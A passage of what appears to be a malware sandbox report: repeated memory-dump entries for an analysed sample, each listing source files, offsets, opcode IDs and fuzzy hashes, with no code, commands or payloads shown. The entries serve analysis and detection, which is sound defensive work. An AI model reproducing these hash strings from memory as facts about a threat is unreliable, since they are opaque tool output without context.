              • Opcode Fuzzy Hash: 6953a03bb36781df7cc7ffd60fc7a301d35e47afa8436831e1a3baa431a8be5e
              • Instruction Fuzzy Hash: 65E181B1608341CFC715CF28C5D1AAABBE0FF89318F05896DE69587752EB31E905CB92
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 58086cd98e11042ae540ee16d7503be1de2eefa00fb89b8f55806e40a4fe1cc5
              • Instruction ID: c5666e317972d7f94bf33756eedd99ef4f934b1f55f2ec7d4844e4d2fdb5ba91
              • Opcode Fuzzy Hash: 58086cd98e11042ae540ee16d7503be1de2eefa00fb89b8f55806e40a4fe1cc5
              • Instruction Fuzzy Hash: 80D10371A0020A8BDB15DF29C880EBB7BB5FF54309F4446AEEA16DB2D0EB34D951CB50
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
              • Instruction ID: 3634af39eba01431c25e9dbab5995feffe0a222d2431b9bc0873dbd9d115a000
              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
              • Instruction Fuzzy Hash: 8AB16274A006069FDF24DB99C940AABFBB9FFD8304F10456EBA12977E1DA35E905CB10
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc38fa213b06585c4fab493a5cc968d33a7c11d23d26c94aade595ef69f189ab
              • Instruction ID: 4c7844fe7d491dc0148c672f07529e0a7711cb19d05667117a3216ce11d76b54
              • Opcode Fuzzy Hash: fc38fa213b06585c4fab493a5cc968d33a7c11d23d26c94aade595ef69f189ab
              • Instruction Fuzzy Hash: C5C13531A00215CBDB25CF2DC4947B9BBAAFB54B2CF1A416EED469B3A6D7308D50CB50
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
              • Instruction ID: bae3b0c6569c1a4ce69d3e20fa99864372206e039fb20f66be35b0e0ed6a4a73
              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
              • Instruction Fuzzy Hash: 41B13635604686DFDB19CBA8C850BBEBBFAAF84708F18015AE6529B395D730ED41CB50
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e01857df817c528634ad1907237f996d9fb6082fb984a8a5b9e11f511b120e85
              • Instruction ID: de64bbb5e94c61586bb51450c5ce40c27bb41021385806b5079f40147e7d61f4
              • Opcode Fuzzy Hash: e01857df817c528634ad1907237f996d9fb6082fb984a8a5b9e11f511b120e85
              • Instruction Fuzzy Hash: 1BA12CB190021AAFEF129FA8CC45BAF7BB9AF55754F014058FA04AB2A0D775DC51CBA0
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b2497953fc54c89ea9e2a2afd4017126234c780e25a03c6eeab11129acdbd7b
              • Instruction ID: 1650673bd1b780b339df0a0d7546776a040494a6c24fe9eec15f3a877b7ebcef
              • Opcode Fuzzy Hash: 8b2497953fc54c89ea9e2a2afd4017126234c780e25a03c6eeab11129acdbd7b
              • Instruction Fuzzy Hash: 50C14774208341CFD764DF19C484BABB7E8BF88708F44496EEA8987791E774E904CB92
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 079831cf5c8cf3111051660c41a96b51c658fcf3ea2b5971434d89ab5d073fe8
              • Instruction ID: dc7c8b87994a9070705a072a4cf637f69aa0c02711669dc76d9b4638a0846e68
              • Opcode Fuzzy Hash: 079831cf5c8cf3111051660c41a96b51c658fcf3ea2b5971434d89ab5d073fe8
              • Instruction Fuzzy Hash: 24B19470A002698BDB25CF59C890BA9B7B5EF44704F5485EAE54AEB391EB30DDC5CF20
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a34dc1c2184b4cfdb7738cf7ce6ffb5eb93e1f120de47ce4170a0c9aedfe2164
              • Instruction ID: f4372e71fab28224e28841624a4077d71157d4047697cb242cf28602bd330a20
              • Opcode Fuzzy Hash: a34dc1c2184b4cfdb7738cf7ce6ffb5eb93e1f120de47ce4170a0c9aedfe2164
              • Instruction Fuzzy Hash: 70A12832E006199FEB21DB5CD844BAEBFB4BB00758F050126EA10AB2E5D7749D4ACBD1
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0a83b1cfeeeb902fd9047c3e37d6912410631e46aabfb7531a63fae07fbf3d9d
              • Instruction ID: 9f6e04e2cab45b0f821a9d3206604490161b1caa754e383bd2045b3d90fa16e0
              • Opcode Fuzzy Hash: 0a83b1cfeeeb902fd9047c3e37d6912410631e46aabfb7531a63fae07fbf3d9d
              • Instruction Fuzzy Hash: 26A1C771B00626DBDB29CF6DC590B6AB7E6FF54318F04402EEB05A7292DB74E851CB50
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bfab03839409a98775ecefc0060bcaeaa9ed57a4bb767fab53f067dd99276101
              • Instruction ID: 6a5c4765c2292b3294126db13a5f7d5515c0f805843a2f15706b6e757d250d6e
              • Opcode Fuzzy Hash: bfab03839409a98775ecefc0060bcaeaa9ed57a4bb767fab53f067dd99276101
              • Instruction Fuzzy Hash: 38A1CC72A10212DFC711EF18C980B6ABBE9FF58708F4A452EE6499B760D734ED01CB91
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cc8b6248c274fedfa11aeadd91f522b0b208a1f5b36fbac44cc7f07c9a7da5fd
              • Instruction ID: 736a6d833cfbef1ec66fe06ae8b6d56f8ef6017a90a30e58949a52f2937e4c3a
              • Opcode Fuzzy Hash: cc8b6248c274fedfa11aeadd91f522b0b208a1f5b36fbac44cc7f07c9a7da5fd
              • Instruction Fuzzy Hash: 02917371D00216BFDF15DF68D884BAEBFB5AB88710F16415AE610EB361D734EA019BA0
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 94b64e278abaf5b661dbdbc0148e723686cad9b2c3e5da3cc03db8479f23089f
              • Instruction ID: a4387c32ef07413e9243568ba2159843c7aa2b27d4767fdb18dc47828a605437
              • Opcode Fuzzy Hash: 94b64e278abaf5b661dbdbc0148e723686cad9b2c3e5da3cc03db8479f23089f
              • Instruction Fuzzy Hash: E2910532A00616CBEB24DB5DC444B7ABFA6EFA4B18F19407EED05AB394EA34DD01C751
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 59ceadc8c3e614101b41ec007358249d5b1a313bb2aeafe6560887a0c9cc73ae
              • Instruction ID: 6b5caa3f3e20117937c1ec1e0a143bd02ca6b46b235f3af90053a2a1cf66ec6d
              • Opcode Fuzzy Hash: 59ceadc8c3e614101b41ec007358249d5b1a313bb2aeafe6560887a0c9cc73ae
              • Instruction Fuzzy Hash: 5BB103B15083418FD365CF29C580A6AFBF1BB88704F18496EF999DB362D731E945CB42
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
              • Instruction ID: 390ea26a94d4e394747926b6a820cdb0083b18223b5591ae91601c724ea03659
              • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
              • Instruction Fuzzy Hash: 1F718075B0021A9BDB20CE69C480ABFBBFDEF54749F59412BD940DB361E338D9418B92
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
              • Instruction ID: 42acf3c58d9424869c6018f4d12e062031473511952c7545df9df82aeefdafd7
              • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
              • Instruction Fuzzy Hash: AE81A37AE002168BDF16CFACC9817AEBBB2FB84314F19416BCD15B7358D6319941CB91
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b4fbd3eb5823a89f300f09b32e0072868763e74a8fcbb7597a04a69d326c5367
              • Instruction ID: 66746a1cc2814f5e71a467deabf7eaff4ea1200506d1e34174fee62cfc16f1d0
              • Opcode Fuzzy Hash: b4fbd3eb5823a89f300f09b32e0072868763e74a8fcbb7597a04a69d326c5367
              • Instruction Fuzzy Hash: A8814C71A00719EFDB25DFA9C884AEEBBF9FF48358F10442AE555A7290D730AC45CB60
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
              • Instruction ID: d4fde9f263bcdcbb8656af537e9bae2d6440d553b61b5f1f165d39b18b824483
              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
              • Instruction Fuzzy Hash: 7E715F71A0061AAFDB11DFA9C944EDEBBB9FF98704F10456AE505E7290DB34EE01CB50
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5787a0b256033e9685c60b23c3805b0118e54d637e14bde8b5f137ac46d32ae6
              • Instruction ID: e7f6dc49a5b1e5c75d399b4f9c31d256325678b236bf5cd6e429d7b4deb50d07
              • Opcode Fuzzy Hash: 5787a0b256033e9685c60b23c3805b0118e54d637e14bde8b5f137ac46d32ae6
              • Instruction Fuzzy Hash: 9271EF32200B01EFFB22DF18C844F5BBBA6EB45724F16852AE6168B2B0D774E945CB50
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6e824c7c32eaefa59481bcf1344a69adb7f52077e42e33188d32a01a06c55484
              • Instruction ID: 2a943e7eee87bf5743182c3d2cfcd665dbd9970c949f592eb461712f62a2712e
              • Opcode Fuzzy Hash: 6e824c7c32eaefa59481bcf1344a69adb7f52077e42e33188d32a01a06c55484
              • Instruction Fuzzy Hash: 63818F75A00205DFCB09CF59C490AAEBBF1FF48300F1581AAD859EB355D734EA41CB90
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1c7955e938a1f56324dc5f713f29338af34a4947bd7a684247d157419489a5a4
              • Instruction ID: 318a938ac4ee252ba84b8fcab06a7fa3056df1cc31a3a6212dbdf6496b049c62
              • Opcode Fuzzy Hash: 1c7955e938a1f56324dc5f713f29338af34a4947bd7a684247d157419489a5a4
              • Instruction Fuzzy Hash: 3361E371600616AFD715DF69C884BEBBBA8FF98728F00461EF85887360DB30E915CB91
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fec05105601918f2792d8c260beb411986c7eb98ff7ec60db322d406e8810d66
              • Instruction ID: 86d2f68efa2d134907c5ffb2e3310ebe3e6303f2482dbc603bde5c210844aa73
              • Opcode Fuzzy Hash: fec05105601918f2792d8c260beb411986c7eb98ff7ec60db322d406e8810d66
              • Instruction Fuzzy Hash: CA61D8312087428BE315DF69C454BEBBBE1FF94728F18486EE9858B3A1D735E806C781
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8c10ec8f88881599d335c6b66d99623015c7bee168cbc8059c009de8a094ca0e
              • Instruction ID: d479422028e2e135696a0fee4ae1a37fa88d2c05675d1d0eeb561d314de4fb9e
              • Opcode Fuzzy Hash: 8c10ec8f88881599d335c6b66d99623015c7bee168cbc8059c009de8a094ca0e
              • Instruction Fuzzy Hash: 20410671240601EFDB269F1DD880B6BFBA9FF54758F51843EE9199B2A5DB30DC018B90
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 50f9c93ed7adaa018ad7e9039085064a03e2abe3777adf0ca59931962059b9f4
              • Instruction ID: a80b5ab14e12fbe6e79ff3cede22d8e442253cf1825443cef4ca35130a4297b2
              • Opcode Fuzzy Hash: 50f9c93ed7adaa018ad7e9039085064a03e2abe3777adf0ca59931962059b9f4
              • Instruction Fuzzy Hash: 2C51E3712003529FD321EF68C981F6B7BE8EB64729F54062EFA11872E1D734E841CBA1
              • Instruction Fuzzy Hash: AD11083A010105ABD7359F65D801A723FB8FB64B84F968029D9049B7B8E334DD01CB54
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7f760c972aa3a3560b20614ae39c9a1d77eb3ad99500487a10f144300de1bdd8
              • Instruction ID: 806db12f44ebfe692a3d3c86bac7938b942b77af2fde628593a6b862ca594f34
              • Opcode Fuzzy Hash: 7f760c972aa3a3560b20614ae39c9a1d77eb3ad99500487a10f144300de1bdd8
              • Instruction Fuzzy Hash: B5019273B00305ABE720ABAEAC81F6BBAECDF95618F050469F705D7241EB70E9018661
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c7a509b8fc5e4a0b131e5320f5aaf1c68798ef52bd24e5b63395f53874855d62
              • Instruction ID: 7f67fc9e74a34b4d2ea4b5b7444e86ec5fd439c89bb36fda078889f8597f460e
              • Opcode Fuzzy Hash: c7a509b8fc5e4a0b131e5320f5aaf1c68798ef52bd24e5b63395f53874855d62
              • Instruction Fuzzy Hash: 7D118272600615DFE721CF69C886BAB77E8EF44358F464429EA85C7251D736EC04CBA1
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
              • Instruction ID: fd94151d5d2a29b8b9075fb867bf6ba447ff2278fbf49edadcd4c23d29d8d0d9
              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
              • Instruction Fuzzy Hash: AB11C6732056C6DBE722971CD544B663F95AB0078CF1900B1DE418BB62F339DC4BC250
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0d37714369831d8f2725e0c2bad63a6126ab21d68edbb01a7e27fe2af1a6f9c3
              • Instruction ID: 5203dddc7ef84ef05bb0da5191d9276fc16ea43137dbd9917552adb26d27e6bc
              • Opcode Fuzzy Hash: 0d37714369831d8f2725e0c2bad63a6126ab21d68edbb01a7e27fe2af1a6f9c3
              • Instruction Fuzzy Hash: B2110EB26006489BD720DF6DE884BAEBBE8FF44704F45007AEA02EB751DA39ED41C750
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
              • Instruction ID: 5183d71704eef54d5792f8973fe9fc9c601a045affa1dfbf45cdd9ae0e69a405
              • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
              • Instruction Fuzzy Hash: AA01807214050ABFEB11AF5ACC80E93FB6DFB64795B50452AF25442570C731ECA1CBA4
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
              • Instruction ID: 5ce834fc687a841b557ae80fcd4a7c83043195a40c5debc836bce51ebdb19fa3
              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
              • Instruction Fuzzy Hash: D50149335047269BCB318F19D840A727BF8FF55B64740852DFD958B681C332D820CB60
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dffb11c3178d60765fe17c8b3786c6f187e5e8bfb9f0e502a08943c1fcf66a74
              • Instruction ID: 8630a5a0a1c244a63bbc1f3043b4f700fba82b7cc8a7bb25d12f3b7525a2264c
              • Opcode Fuzzy Hash: dffb11c3178d60765fe17c8b3786c6f187e5e8bfb9f0e502a08943c1fcf66a74
              • Instruction Fuzzy Hash: 6A118B32241641EFDB15EF19CD80F56BBB8FF54B48F240069EA069B661C235ED01CBA0
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8e10dfd7eedb423a4d7a7d52272b4998c2eb671cb64f33dadaa54e33c03c00ed
              • Instruction ID: a54b752835416f37a10495b4ad96a3cac61c5438b2c0a746921130e816bf3acc
              • Opcode Fuzzy Hash: 8e10dfd7eedb423a4d7a7d52272b4998c2eb671cb64f33dadaa54e33c03c00ed
              • Instruction Fuzzy Hash: A4115E7054122DABEB25AF68CD42FE97274BF04714F5041D9A719AA1E1D6709E81CF84
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3dec23d32ad359fc31f792185c587ae461355fe732c4b58cc01011a88ae491e2
              • Instruction ID: 7e1949b4d10b70e19d3b84a0e6adceca71c0cb9b6109ec10d21cc4df23bd9e9f
              • Opcode Fuzzy Hash: 3dec23d32ad359fc31f792185c587ae461355fe732c4b58cc01011a88ae491e2
              • Instruction Fuzzy Hash: 93111BB2900119BBCB15DB98CC85DDFBB7CEF58258F054166E506A7211EA34EA15CBE0
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
              • Instruction ID: 928ba87456a1e3615b2072fd475a4c8e4bd8ee3c4a4b5d5b42c2ea06683ce1e0
              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
              • Instruction Fuzzy Hash: B20128322001018BDF229A5DD8C0BD3776BBFC8704F1642BAEE018F696EA71EC85C790
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9481dd13eb01ac3bc310d64caad36ef99f79c1bfb7ec7c531f35d914a704f70
              • Instruction ID: 78ddb7178751d933d30d8c7fa698fcee8332b1780738f47b97fa30e91416d2f5
              • Opcode Fuzzy Hash: f9481dd13eb01ac3bc310d64caad36ef99f79c1bfb7ec7c531f35d914a704f70
              • Instruction Fuzzy Hash: 0511C8726441459FD711CF58D400BA6BBB5FB56314F09815AE848CF325D731EC41CBE0
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
              • Instruction ID: b9219fcea9fd629e41070a5bef63747355720ffcbfc683e88444df12b0f57711
              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
              • Instruction Fuzzy Hash: AB012D321007099FDB23D6AEC400FA777EDFFD5214F44842EA94687590DA71E405C750
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 88aba59d343352953394e05ffc393e111508a43674d88f690dae6063d5880fa4
              • Instruction ID: 35d8118cc363e95f6c2a644f8be4e2ca80bb7b51ce013eda2b3fde888739c3c4
              • Opcode Fuzzy Hash: 88aba59d343352953394e05ffc393e111508a43674d88f690dae6063d5880fa4
              • Instruction Fuzzy Hash: 2D116D75A0020DEBCB05DF68C850FAF7BB9EB44654F10405DEA119B290D635EE51CB90
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 54489f0445556c24ccec85383a83a56c61557c02e48bc1783b46bdea2e6dacd4
              • Instruction ID: e84b909ee17c10b77808ddaf0f56c71890171c4fcfb2355f15070269b25ee334
              • Opcode Fuzzy Hash: 54489f0445556c24ccec85383a83a56c61557c02e48bc1783b46bdea2e6dacd4
              • Instruction Fuzzy Hash: 26018472201615BBD711AB6DCD40E57B7ACFF65A58B05052EB10593661DF34EC01C7A4
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
              • Instruction ID: 090021bf9b5848d0f4270056ba72c62577ff1657edd0de4b81410ff99d205ea9
